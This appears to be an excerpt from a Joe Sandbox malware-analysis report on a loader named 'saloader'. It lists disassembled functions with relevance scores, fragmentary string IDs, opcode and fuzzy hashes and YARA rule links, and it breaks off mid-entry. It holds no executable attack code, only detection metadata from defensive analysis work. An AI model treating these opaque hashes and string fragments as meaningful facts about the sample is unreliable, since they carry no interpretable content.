                                                                                          • String ID: :9O$(:9O$(:9O$0:9O$8:9O$@:9O$@:9O$H:9O$P:9O$X:9O$`:9O$h:9O$h:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O$p:9O
                                                                                          • API String ID: 0-342762857
                                                                                          • Opcode ID: 3ecee3aa9fb95fc425cdc67cd10f1952a26a48f3ce4b3209afba1a2d443c9c0d
                                                                                          • Instruction ID: 9bc137bdb4a8b88361af32c2143e39dfe122229084cf789def0ff7a33458bd65
                                                                                          • Opcode Fuzzy Hash: 3ecee3aa9fb95fc425cdc67cd10f1952a26a48f3ce4b3209afba1a2d443c9c0d
                                                                                          • Instruction Fuzzy Hash: D5627735A08A4B8FE78ADF68D810A55B7F1FF4735071941E6E40ACF293EA389CC58B51
                                                                                          Function 00007FFAAC7DB03E Relevance: 24.7, Strings: 19, Instructions: 941COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ^9O$(^9O$0^9O$8^9O$@^9O$H^9O$P^9O$X$X]9O$X^9O$`]9O$`^9O$h]9O$h^9O$p]9O$p^9O$x]9O$]9O$]9O
                                                                                          • API String ID: 0-3782002257
                                                                                          • Opcode ID: 54ce0f009e2047272de8b5fcd4c980b5220374a20621082b1f6e279385dc63f7
                                                                                          • Instruction ID: 8a256df3ae5795e9ab461e5483c409b43d200ada1b168341757428a5979a3fb4
                                                                                          • Opcode Fuzzy Hash: 54ce0f009e2047272de8b5fcd4c980b5220374a20621082b1f6e279385dc63f7
                                                                                          • Instruction Fuzzy Hash: FE62D435D0E6478FF757DB24C812A95BBF1EF42311F5985F6C448CB192DA38E88A8B90
                                                                                          Function 00007FFAAC7E8AFA Relevance: 10.2, Strings: 8, Instructions: 224COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1_^-$1_^2$1_^3$1_^D$1_^G$1_^J$1_^M$x69O
                                                                                          • API String ID: 0-3489492365
                                                                                          • Opcode ID: 002156ebaa718d7c3d1ced88e9c723879c7aa68b2909c3e6c626c7c1bfa0f9bd
                                                                                          • Instruction ID: 8c060611cf02cbcdae191522e5e10c38287285ca631eebb66c01055dc5bcc9d8
                                                                                          • Opcode Fuzzy Hash: 002156ebaa718d7c3d1ced88e9c723879c7aa68b2909c3e6c626c7c1bfa0f9bd
                                                                                          • Instruction Fuzzy Hash: ED5178A3A1D6469FF385A63C98955F97BD0FF5625470441BED14ECB293CE14A84B82C0
                                                                                          Function 00007FFAAC612731 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @c9O$`c9O$hc9O$r6$r6$yU_H
                                                                                          • API String ID: 0-3036373850
                                                                                          • Opcode ID: caa995e07e2dd85c110b7375e6541316ab95839350f615ff6aae750dfdf36d96
                                                                                          • Instruction ID: d0b0a1c1cfd82bc6f699d6cdadd89f222ed58c30ebe819a26e77eddd1b6e40b1
                                                                                          • Opcode Fuzzy Hash: caa995e07e2dd85c110b7375e6541316ab95839350f615ff6aae750dfdf36d96
                                                                                          • Instruction Fuzzy Hash: 0DA1F672A18A094FE795EB2CD845AB9B7E1FB99351F00517AE04EC3292DF34EC4687C1
                                                                                          Function 00007FFAAC610E30 Relevance: 7.8, Strings: 6, Instructions: 331COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @c9O$`c9O$hc9O$r6$r6$yU_H
                                                                                          • API String ID: 0-3036373850
                                                                                          • Opcode ID: b2605a6af32fbe35319e7942f30125fff9ca6c949e69b85e4e0089193923f09b
                                                                                          • Instruction ID: 13e91aa13561e8d74d76f8a91f7199846efdf6daac338f20007a014cd2e1eebd
                                                                                          • Opcode Fuzzy Hash: b2605a6af32fbe35319e7942f30125fff9ca6c949e69b85e4e0089193923f09b
                                                                                          • Instruction Fuzzy Hash: 88A1F872E18A094FE7A5EB2CD845AB9B3E1FB99351F00517AE04EC3292DE34EC4647C1
                                                                                          Function 00007FFAAC617D67 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [9O$ [9O$ [9O$ [9O$ [9O
                                                                                          • API String ID: 0-93671312
                                                                                          • Opcode ID: 3f61da9a450ad0c74c44b279ea69e2493595e841ef0ef0e874dc4dab5a3690b2
                                                                                          • Instruction ID: a09a2d0299586a1d669e75cc6df7a83ca3a7acd56afd5e7e328a81fa6833dbd3
                                                                                          • Opcode Fuzzy Hash: 3f61da9a450ad0c74c44b279ea69e2493595e841ef0ef0e874dc4dab5a3690b2
                                                                                          • Instruction Fuzzy Hash: DDA1E755919A8B8FFB96DB38C4146B56BE2FF56200B1894F9D00EC71C7DD28EC468381
                                                                                          Function 00007FFAAC610E48 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0c9O$8c9O$Xc9O$r6
                                                                                          • API String ID: 0-50982374
                                                                                          • Opcode ID: e8dc4825b0b9d6e0ed05f83e3d402bff692b07071bb3fc020c7d678cd42b24cf
                                                                                          • Instruction ID: 57c7f4b702343a8d0e57b8471d67a10946c606f407110acc6b6736b352f40a45
                                                                                          • Opcode Fuzzy Hash: e8dc4825b0b9d6e0ed05f83e3d402bff692b07071bb3fc020c7d678cd42b24cf
                                                                                          • Instruction Fuzzy Hash: BF711471B1CB4A4FE749AB2C985667977D1EB9A351F04427EE44EC3293EE24E8064282
                                                                                          Function 00007FFAAC628EB9 Relevance: 5.2, Strings: 4, Instructions: 243COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Pa9O$Xa9O$`a9O$p:9O
                                                                                          • API String ID: 0-649195745
                                                                                          • Opcode ID: 9ed9f7ad6c00e8d6730f2305c50a1de37b80e847d11eb21a64e7b4b6d598cdca
                                                                                          • Instruction ID: fac050b01a56481775af3699ec17a32ac1fa03a80ba078b91487960d209d079f
                                                                                          • Opcode Fuzzy Hash: 9ed9f7ad6c00e8d6730f2305c50a1de37b80e847d11eb21a64e7b4b6d598cdca
                                                                                          • Instruction Fuzzy Hash: AB71F332C0E68A8FF766D77488155E5BBE1EF47350F0991FAD45CCB093EA29990E8381
                                                                                          Function 00007FFAAC62373E Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8`9O$8`9O$8`9O$@`9O
                                                                                          • API String ID: 0-1856317218
                                                                                          • Opcode ID: 6c3420569fb6d143a4fbf0f5eecb7888c87f17ad0779e5ee14987f44f6b3c6af
                                                                                          • Instruction ID: afde528a44bd1469cbd9b75bd19c5fca3cbb706e9b262d7106fdf3c1af6b8103
                                                                                          • Opcode Fuzzy Hash: 6c3420569fb6d143a4fbf0f5eecb7888c87f17ad0779e5ee14987f44f6b3c6af
                                                                                          • Instruction Fuzzy Hash: DB61F931A08A4A8FEB89DF6CD455A7477E1FB56311B0041BAD40EC72D2EE38DC46C781
                                                                                          Function 00007FFAAC7DB8EE Relevance: 5.2, Strings: 4, Instructions: 215COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P^9O$X$`^9O$p^9O
                                                                                          • API String ID: 0-2403148095
                                                                                          • Opcode ID: b2c21ca66045f45142511f12ffb1d1a392be15f0c3f20026d013a1e215aad717
                                                                                          • Instruction ID: f02efff2fb9369044ad08138d4b2b220e88bb1b1777b40950abd4ed234bc37f3
                                                                                          • Opcode Fuzzy Hash: b2c21ca66045f45142511f12ffb1d1a392be15f0c3f20026d013a1e215aad717
                                                                                          • Instruction Fuzzy Hash: F361C36190E6C68FF757977888516A47FF0EF97210F0881FBD04DCB1A3D928A84A8B91
                                                                                          Function 00007FFAAC624600 Relevance: 4.7, Strings: 3, Instructions: 937COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P`9O$``9O$h`9O
                                                                                          • API String ID: 0-1465589638
                                                                                          • Opcode ID: 7799dee68063c173daf5f187e0efeb05ef41d310a418e1dc1a600b931eedb400
                                                                                          • Instruction ID: 70358bc3e346cfb9f9c080e64990a73f9a2f1520aff95d9d34e44ff080a2e315
                                                                                          • Opcode Fuzzy Hash: 7799dee68063c173daf5f187e0efeb05ef41d310a418e1dc1a600b931eedb400
                                                                                          • Instruction Fuzzy Hash: 1662A430A1964A8FEB8ADF18C454AB5B7E1FF55300F5495B9D40EC7296DF38E886CB80
                                                                                          Function 00007FFAAC625640 Relevance: 4.6, Strings: 3, Instructions: 810COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p:O$x69O$x69O
                                                                                          • API String ID: 0-3636361901
                                                                                          • Opcode ID: 41bc111b1140652e3a4c83de225681ba105605a671dcab3f34acde4af4777f11
                                                                                          • Instruction ID: 28e3e0a088285a7175aea3aef1c15a664f5edb27fe4e6a8095024fd061f71520
                                                                                          • Opcode Fuzzy Hash: 41bc111b1140652e3a4c83de225681ba105605a671dcab3f34acde4af4777f11
                                                                                          • Instruction Fuzzy Hash: 6A525170A19A0ACFEB99DB18C454AA5B7F1FF99300F1491B9D40ED7296DE34EC85CB80
                                                                                          Function 00007FFAAC7EA87D Relevance: 4.4, Strings: 3, Instructions: 682COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Z9O$Z9O$Z9O
                                                                                          • API String ID: 0-67574322
                                                                                          • Opcode ID: 0b0f3c0d7abed537ccd41d4ce2970743845917776a377a5028825d737d8eb86d
                                                                                          • Instruction ID: abdc3768b9ec47291f5b4c23ffbfd9aaf84654a1171e90648b42a34f70cb9d6e
                                                                                          • Opcode Fuzzy Hash: 0b0f3c0d7abed537ccd41d4ce2970743845917776a377a5028825d737d8eb86d
                                                                                          • Instruction Fuzzy Hash: 85B13732A1EA4A8FF75A9B7898516B53FE1EF46324B0441FAD04EC71D3DE19EC468381
                                                                                          Function 00007FFAAC610E70 Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: r6$r6$r6
                                                                                          • API String ID: 0-701349563
                                                                                          • Opcode ID: cff5746227fd0919f19f10cb2a2c62e00d96dc29b8fc8ca3847f9f34aec65e13
                                                                                          • Instruction ID: a3b74c1aab1def78ac71deba476b978e31c6eb91893a6f027d18069eba45cb33
                                                                                          • Opcode Fuzzy Hash: cff5746227fd0919f19f10cb2a2c62e00d96dc29b8fc8ca3847f9f34aec65e13
                                                                                          • Instruction Fuzzy Hash: 8651C471E19A4D8FFB89DB5888556BD7BE2FF99301F04A17AD04DE3282CE34AC058791
                                                                                          Function 00007FFAAC612E19 Relevance: 3.9, Strings: 3, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0c9O$8c9O$Xc9O
                                                                                          • API String ID: 0-3542375956
                                                                                          • Opcode ID: eb6940bff62b8977ae268b6c4aed6a1e64ae32a407371fc2c064da1a96dbc088
                                                                                          • Instruction ID: c2e9d006dac1831404709dc5c339af087e5ba266941d81f274b1ab34f9e742a0
                                                                                          • Opcode Fuzzy Hash: eb6940bff62b8977ae268b6c4aed6a1e64ae32a407371fc2c064da1a96dbc088
                                                                                          • Instruction Fuzzy Hash: 54410771A1D7458FE709AB3CD8565B9B7D1EF86310F0442BFE44DC72A3DD28B8468286
                                                                                          Function 00007FFAAC640FA8 Relevance: 3.4, Strings: 2, Instructions: 883COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: :O$ :O
                                                                                          • API String ID: 0-1257208304
                                                                                          • Opcode ID: 1dd027914273192de34f5187e98a35056888034d4c9455cd80dc2ef0485db11f
                                                                                          • Instruction ID: aee1c1aa87faca4efdbf0121b3555fbdc5e2a6313b2933ca103039eb1b411762
                                                                                          • Opcode Fuzzy Hash: 1dd027914273192de34f5187e98a35056888034d4c9455cd80dc2ef0485db11f
                                                                                          • Instruction Fuzzy Hash: FD529E30619A49CFEB95EB2CC554BA577E1FF5A300F0850FAD44ECB2A6DA24EC45C781
                                                                                          Function 00007FFAAC7EB1E0 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: XV$S9O
                                                                                          • API String ID: 0-3315407438
                                                                                          • Opcode ID: 77613448aec3cfdea575436d904062850355fb0177ad67ebb974d119a18ba71b
                                                                                          • Instruction ID: 762509cda8818b54e2ad087e5aa79bb86fa119abdca05189c27ed846ba131ce8
                                                                                          • Opcode Fuzzy Hash: 77613448aec3cfdea575436d904062850355fb0177ad67ebb974d119a18ba71b
                                                                                          • Instruction Fuzzy Hash: 15E1F772A1DA498FEB59EB28C455AB97BE1FF96300F1441BDD04EC7292CE24EC46C781
                                                                                          Function 00007FFAAC7E3D2E Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (\9O$(\9O
                                                                                          • API String ID: 0-3269100254
                                                                                          • Opcode ID: af433d99b2ce2a7e8b5b5b89a7dbfa180416bd111c5e6b01efaf4cede6e4bcf9
                                                                                          • Instruction ID: 9d56e517977fe684d27fb81d67a19dd92a6d66ae0547b1788786bc80882f915c
                                                                                          • Opcode Fuzzy Hash: af433d99b2ce2a7e8b5b5b89a7dbfa180416bd111c5e6b01efaf4cede6e4bcf9
                                                                                          • Instruction Fuzzy Hash: C5A19835608A4E8FDB89EF2CC455AA973F2FF99310B5441A9D40AC7296DF34EC42CB80
                                                                                          Function 00007FFAAC7DE9D0 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Z2_^$/
                                                                                          • API String ID: 0-1452589840
                                                                                          • Opcode ID: 3cd2356cef9a59b05dd2427d277917babf38373ed29cf26d91e98499d1700c2a
                                                                                          • Instruction ID: 028b0b9b959d2e1dbdfbf088bca9bcd99cb3e43573d4e02371dd772f5fd57fb6
                                                                                          • Opcode Fuzzy Hash: 3cd2356cef9a59b05dd2427d277917babf38373ed29cf26d91e98499d1700c2a
                                                                                          • Instruction Fuzzy Hash: DA810731A1DA0A8BE796E73898556F97BE1FF8A310F5441BAD04EC3293DE24D8458780
                                                                                          Function 00007FFAAC7DE9F8 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Z2_^$/
                                                                                          • API String ID: 0-1452589840
                                                                                          • Opcode ID: c251e3f82984b1d9d06428521018d86973878f330f06ca3bf359f58e194f673e
                                                                                          • Instruction ID: 9a56c26cd7ba7a55f22082b1d935593e8d3f26c8c504f229aa4e3870c360cf45
                                                                                          • Opcode Fuzzy Hash: c251e3f82984b1d9d06428521018d86973878f330f06ca3bf359f58e194f673e
                                                                                          • Instruction Fuzzy Hash: 4781F731A1DA4A8FE796EB3888556F97BE1FF9A310F5441BAD04EC3293DE24DC458780
                                                                                          Function 00007FFAAC7EB206 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: XV$S9O
                                                                                          • API String ID: 0-3315407438
                                                                                          • Opcode ID: 26bace8277a4131f9271c6f04e2c9ec0bd85c7a10edf215f74cb59649b8058a7
                                                                                          • Instruction ID: 3cee127ad56e02d58605244782bba43fa1f85ab76a497c1cdcfba8993bd4cb01
                                                                                          • Opcode Fuzzy Hash: 26bace8277a4131f9271c6f04e2c9ec0bd85c7a10edf215f74cb59649b8058a7
                                                                                          • Instruction Fuzzy Hash: 1F81D771A1CA498FEB59EB28C455AB97BE1FF9A300F1441B9D00EC72D3CE24EC468781
                                                                                          Function 00007FFAAC7E8038 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?_H$H
                                                                                          • API String ID: 0-4044841034
                                                                                          • Opcode ID: 5c478833229f35fbf1baa66cfcedc0da2f67e569f685a34375a825c243d8f7b5
                                                                                          • Instruction ID: 2ad7962e2e0cbabc2609077ec4b29175e49883fefd25779b53c83eb695ca621d
                                                                                          • Opcode Fuzzy Hash: 5c478833229f35fbf1baa66cfcedc0da2f67e569f685a34375a825c243d8f7b5
                                                                                          • Instruction Fuzzy Hash: 0351367284D6854FEB169738AC169F57BF4EF53320B0941ABD08DDB193D92CA84A83D2
                                                                                          Function 00007FFAAC7DBB35 Relevance: 2.7, Strings: 2, Instructions: 212COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (^9O$8^9O
                                                                                          • API String ID: 0-3546416722
                                                                                          • Opcode ID: fe56f8b9583fda16d2569d6e94aa5026717c1c83aca8d0b406b2483a6f7cebef
                                                                                          • Instruction ID: aac3d7af0433120fddd859c7381fb433afa3d44cf409f9eb37b4b84b92715bf1
                                                                                          • Opcode Fuzzy Hash: fe56f8b9583fda16d2569d6e94aa5026717c1c83aca8d0b406b2483a6f7cebef
                                                                                          • Instruction Fuzzy Hash: 4A61823190DB498FFB969B6898556B97BF1FF56300F0441BBD04ED72C2DE28A8498BC1
                                                                                          Function 00007FFAAC7E7830 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (79O$/
                                                                                          • API String ID: 0-1687341922
                                                                                          • Opcode ID: b3942c988e2ddd46ca222080e9fdb1ff4784b7e7055521b22bf2f649ded8596d
                                                                                          • Instruction ID: f809c606683e70d8875d641579f32d02dfcaafe701f48726714a98cd48630cc2
                                                                                          • Opcode Fuzzy Hash: b3942c988e2ddd46ca222080e9fdb1ff4784b7e7055521b22bf2f649ded8596d
                                                                                          • Instruction Fuzzy Hash: 2E711E75618A4ACFDB89EF28C494BA973F1FF59300B5045A9D41ECB296CF35E846CB80
                                                                                          Function 00007FFAAC7DB9B9 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: h^9O$p^9O
                                                                                          • API String ID: 0-1397781895
                                                                                          • Opcode ID: 2164a25933dfab699f5a799b97c6ff4055f3a3339963758ecb11f096360363cd
                                                                                          • Instruction ID: dc656ae6eeeb89e54fbbe6232831f4769cdcf55de6ca1d606766e583777548ba
                                                                                          • Opcode Fuzzy Hash: 2164a25933dfab699f5a799b97c6ff4055f3a3339963758ecb11f096360363cd
                                                                                          • Instruction Fuzzy Hash: E341EB3190EA868FF35B976888556A47FF0FF87310F4881FBD04DCB5A3D91898498B81
                                                                                          Function 00007FFAAC7E68A0 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?_H$H
                                                                                          • API String ID: 0-4044841034
                                                                                          • Opcode ID: 7804f9e15c691a1562eca1aae3b0efaad02e6bdcbfb2805066840c88e3418f71
                                                                                          • Instruction ID: 1e77447755f09a244fdbe57d84578e9ec18cea9ee0527715b41ee9418d73da06
                                                                                          • Opcode Fuzzy Hash: 7804f9e15c691a1562eca1aae3b0efaad02e6bdcbfb2805066840c88e3418f71
                                                                                          • Instruction Fuzzy Hash: 9C319572D1CA198FEB58E76C944AAB977E1EF99350F00417ED40EE3252EE24A84547C1
                                                                                          Function 00007FFAAC61655D Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (79O$@79O
                                                                                          • API String ID: 0-4115383582
                                                                                          • Opcode ID: 7ca6cbf86243579fd7bf8a83079e9d8e7c79b533d1b5651c192f16148c035bff
                                                                                          • Instruction ID: 98ac9071c5b2fb69a32c7bdd73f97ccc04560a36aff953ad742f1484b09a4763
                                                                                          • Opcode Fuzzy Hash: 7ca6cbf86243579fd7bf8a83079e9d8e7c79b533d1b5651c192f16148c035bff
                                                                                          • Instruction Fuzzy Hash: CD31D331D2995A8FEB45EB28C855AF9B7F0FF4A301F0450B6E00DD71A3DE28A945C790
                                                                                          Function 00007FFAAC613E74 Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
